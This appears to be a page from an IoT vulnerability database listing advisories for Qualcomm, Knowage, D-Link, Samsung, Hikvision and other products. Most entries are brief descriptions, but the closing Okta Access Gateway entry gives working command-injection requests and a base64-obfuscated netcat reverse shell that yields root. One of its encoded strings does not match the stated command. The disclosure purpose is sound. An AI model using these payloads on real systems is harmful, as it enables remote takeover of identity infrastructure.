VARIoT IoT vulnerabilities database

Out of bound memory read while unpacking data due to lack of offset length check in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables. plural Qualcomm The product contains an out-of-bounds read vulnerability.Information is obtained and denial of service (DoS) It may be put into a state

Denial of service while processing RTCP packets containing multiple SDES reports due to memory for last SDES packet is freed and rest of the memory is leaked in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Wearables. plural Qualcomm The product contains a vulnerability regarding the lack of free memory after expiration.Denial of service (DoS) It may be put into a state

A SQL injection vulnerability in Knowage Suite version 7.1 exists in the documentexecution/url analytics driver component via the 'par_year' parameter when running a report

Knowage Suite before 7.4 is vulnerable to cross-site scripting (XSS). An attacker can inject arbitrary external script in '/knowagecockpitengine/api/1.0/pages/execute' via the 'SBI_HOST' parameter

A stored HTML injection vulnerability exists in Knowage Suite version 7.1. An attacker can inject arbitrary HTML in "/restful-services/2.0/analyticalDrivers" via the 'LABEL' and 'NAME' parameters. Knowage Suite Is vulnerable to injection.Information may be obtained and information may be tampered with

Knowage Suite before 7.4 is vulnerable to reflected cross-site scripting (XSS). An attacker can inject arbitrary web script in /restful-services/publish via the 'EXEC_FROM' parameter that can lead to data leakage

myRetailerPlus is a web application. DCS Synthesis myRetailerPlus has a SQL injection vulnerability, which can be exploited by attackers to obtain sensitive database information.

WV-SW396 is a camera of Matsushita Electric (China) Co., Ltd. Panasonic cameras have an unauthorized access vulnerability, which can be exploited by attackers to obtain sensitive information.

Sanyo generally refers to Sanyo. Sanyo (English name: SANYO) is a large-scale enterprise group with a history of 60 years in Japan. Headquartered in Osaka, Japan, its products involve displays, mobile phones, digital cameras, machinery, biopharmaceuticals and many other fields. The SANYO camera has a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

Shenzhen Zhianshi Technology Co., Ltd. is committed to the research and development of video surveillance technology and provides users with humanized video surveillance solutions. The tantos series cameras have a weak password vulnerability, which can be exploited by attackers to obtain sensitive information.

DrayTek Vigor series routers are dual WAN port security firewall routers designed for medium-sized enterprises. DrayTek Vigor 2960/3900/300B VPN Firewall has a command injection vulnerability. Attackers can use the vulnerability to execute arbitrary commands to obtain router permissions.

Samsung (China) Investment Co., Ltd. is the headquarters of Samsung Group in China. As of the end of 2008, 20 of Samsung's more than 30 companies have invested in China, including Samsung Electronics, Samsung SDI, Samsung SDS, and Samsung Electro-Mechanics. The Samsung router WLAN AP has an arbitrary file reading vulnerability. Attackers can use this vulnerability to read sensitive files on the router and obtain sensitive information.

Samsung (China) Investment Co., Ltd. is the headquarters of Samsung Group in China. As of the end of 2008, 20 of Samsung's more than 30 companies have invested in China, including Samsung Electronics, Samsung SDI, Samsung SDS, and Samsung Electro-Mechanics. Samsung router WLAN AP has a command execution vulnerability. Attackers can use this vulnerability to execute commands.

Shenzhen Jixiang Tengda Technology Co., Ltd. (hereinafter referred to as "Tengda") was founded in 1999 and is a professional supplier of network communication equipment and solutions. The Tenda router has a weak password vulnerability. Attackers can use the default weak password to log in to the background of the system to obtain sensitive information.

TerraMaster F2-210 devices through 2021-04-03 use UPnP to make the admin web server accessible over the Internet on TCP port 8181, which is arguably inconsistent with the "It is only available on the local network" documentation. NOTE: manually editing /etc/upnp.json provides a partial but undocumented workaround. TerraMaster F2-210 The device contains a vulnerability related to unauthorized authentication.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state

Hikvision is a video-centric intelligent IoT solution and big data service provider. Many Hikvision IP Cameras have weak password vulnerabilities. Attackers use this vulnerability to log in to the system backend to gain administrator privileges.

An issue was discovered in prog.cgi on D-Link DIR-878 1.30B08 devices. Because strcat is misused, there is a stack-based buffer overflow that does not require authentication. D-Link DIR-878 The device contains an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DIR-878 is a wireless router produced by D-Link in Taiwan. The prog.cgi in D-Link DIR-878 1.30B08 has a stack buffer overflow vulnerability

An issue was discovered in WiZ Colors A60 1.14.0. The device sends unnecessary information to the cloud controller server. Although this information is sent encrypted and has low risk in isolation, it decreases the privacy of the end user. The information sent includes the local IP address being used and the SSID of the Wi-Fi network the device is connected to. (Various resources such as wigle.net can be use for mapping of SSIDs to physical locations.). No detailed vulnerability details are currently provided. The Lightbulb by default transmits privacy sensitive info to the cloud system. ------------------------------------------ [Reference] N/A ------------------------------------------ [Has vendor confirmed or acknowledged the vulnerability?] true ------------------------------------------ [Discoverer] Willem Westerhof, Wouter Wessels, Jim Blankendaal, Jasper Nota from Qbit in assignment of the Consumentenbond. Use CVE-2020-11922

HNAP1/control/SetMasterWLanSettings.php in D-Link D-Link Router DIR-846 DIR-846 A1_100.26 allows remote attackers to execute arbitrary commands via shell metacharacters in the ssid0 or ssid1 parameter. D-Link Router DIR-846 Has OS A command injection vulnerability exists.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. D-Link DIR-846 is a 6-antenna 1200M full gigabit dual-band MU-MIMO wireless router. D-Link DIR-846 A1_100.26 version has an OS command injection vulnerability

A command injection vulnerability in the cookieDomain and relayDomain parameters of Okta Access Gateway before 2020.9.3 allows attackers (with admin access to the Okta Access Gateway UI) to execute OS commands as a privileged system account. Since the injection occurs when a script is executed with sudo, the commands are ran with root privileges. BUG #1 - relay Command injection as root in Applications via the 'relaydomain' field when passing parameters to generateCert.sh. This is blind injection, so without monitoring logs or local execution instrumentation, the output will not simply returned in the response. Also, the included 'nc' binary that the system image includes has the -e flag available which enables an exploitation easier via connect back shell. [Request] POST /api/v1/app/idp/[valid-IDP] HTTP/1.1 Host: gw-admin.domain.tld Content-Type: application/json;charset=utf-8 X-CSRF-TOKEN: [placeholder] Content-Length: 134 Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder] {"settings": {"label":"test", "type":"CERTHEADER2015_APP", "relaydomain":"..$(whoami)", <-- HERE "groups":[], "handlers":{}} ,"policies":[{}]} [Response /w local instrumentation for monitoring] pid=23033 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d .root ] [Quick testing] "relaydomain":"..$(reboot)" and the system should reboot. [Exploitation for reverse shell] Note: for some bizzare reason, this payload worked for a period of time during testing, but was not generally reproducible afterwards. 1) generate base64 for the connect back command to be executed $ echo -n "nc 10.0.0.111 5000 -e /bin/bash" | base64 bmMgMTAuMTAuMTAuMTc5IDU1NTUgLWUgL2Jpbi9iYXNo 2) start a listener $ nc -l -p 5000 ... 3) make the request with the payload (.. is required due to how it parses domains) ..$(echo${IFS}'bmMgMTAuMC4wLjExMSA1MDAwIC1lIC9iaW4vYmFzaA=='>test;$(base64${IFS}-d${IFS}test)) 4) get a root shell from the server * connection from 10.0.0.77 * python -c 'import pty; pty.spawn("/bin/bash")' [0] root@oag.okta.com;/root# Note: the hostname of the local OAG test system happens to be oag.okta.com and has nothing to do with any Okta company servers. BUG #2 - cookie Command injection as root in Identity Providers via the 'cookieDomain' field when passing parameters to generateCert.sh. [Request] POST /api/v1/setting/idp/local HTTP/1.1 Host: gw-admin.domain.tld Content-Type: application/json;charset=utf-8 X-CSRF-TOKEN: [placeholder] Content-Length: 222 Cookie: CSRF-TOKEN=[placeholder]; JSESSIONID=[placeholder]; SessionCookie=[placeholder] {"subCategory": "IDP_SAML_LOCAL", "json":{ "name":"Local OAG IDP", "host":"https://google.com", "cookieDomain":"$(uname${IFS}-n)", <-- HERE "nameIDFormat":"urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified", "metadata":{}}, "$edit":true} [Response /w local instrumentation for monitoring] pid=22822 executed [/bin/bash /opt/oag/bin/generateCert.sh -w -d Linux oag 3.10.0-957.27.2.el7.x86_64 #1 SMP Mon Jul 29 17:46:05 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root) ] [Quick testing] "cookieDomain":"$(reboot)" and the system should reboot. [Exploitation for executing commands with output in the webroot] Same note as the previous one; for some reason, this payload worked for a period of time during testing, but then stopped fully working (the bug was still there just less exploitable). 1) generate base64 for "ls -al /root" to be written to a location accessible via web request $ echo -n "script -q -c ls\$IFS-al\$IFS/root /opt/oag/simpleSAMLphp/www/test.php" | base64 -w0 c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA== 2) make the request with the payload $(echo${IFS}'c2NyaXB0IC1xIC1jIGxzJElGUy1hbCRJRlMvcm9vdCAvb3B0L29hZy9zaW1wbGVTQU1McGhwL3d3dy90ZXN0LnBocA=='>test;$(base64${IFS}-d${IFS}test)) 3) check https://gw-admin.domain.tld/auth/test.php for the output of the command === Fix === The cookie bug was a "known issue" and fixed in v2020.9.3 and the relay bug was also fixed and no longer works on the latest v2021.2.1. https://www.okta.com/security-advisories/cve-2021-28113/